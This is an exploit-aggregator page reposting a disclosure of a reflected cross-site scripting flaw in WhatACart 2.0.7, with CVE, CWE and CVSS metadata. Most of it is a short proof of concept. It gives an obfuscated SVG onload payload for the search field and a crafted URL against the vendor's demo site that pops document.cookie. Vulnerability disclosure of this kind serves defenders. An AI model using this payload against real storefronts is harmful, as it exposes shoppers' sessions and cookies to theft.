Advertisement






WhatACart 2.0.7 Cross Site Scripting

CVE Category Price Severity
CVE-2020-8983 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-12-27
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023120055

Below is a copy:

WhatACart 2.0.7 Cross Site Scripting
# Exploit Title: WhatACart Version: 2.0.7 - Reflected XSS
# Date: 2023-12-27
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://whatacart.com
# Version: 2.0.7
# Tested on: https://whatacart.com/demo


1 ) Go to this page : https://demo.whatacart.com/
2 ) Write search field this payload : <sVg/onLy=1 onLoaD=confirm(1)//
3 ) You will bee alert button : https://demo.whatacart.com/site/default/search?keyword=%3CsVg%2FonLy%3D1+onLoaD%3Dconfirm(document.cookie)%2F%2F&navsearch=

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.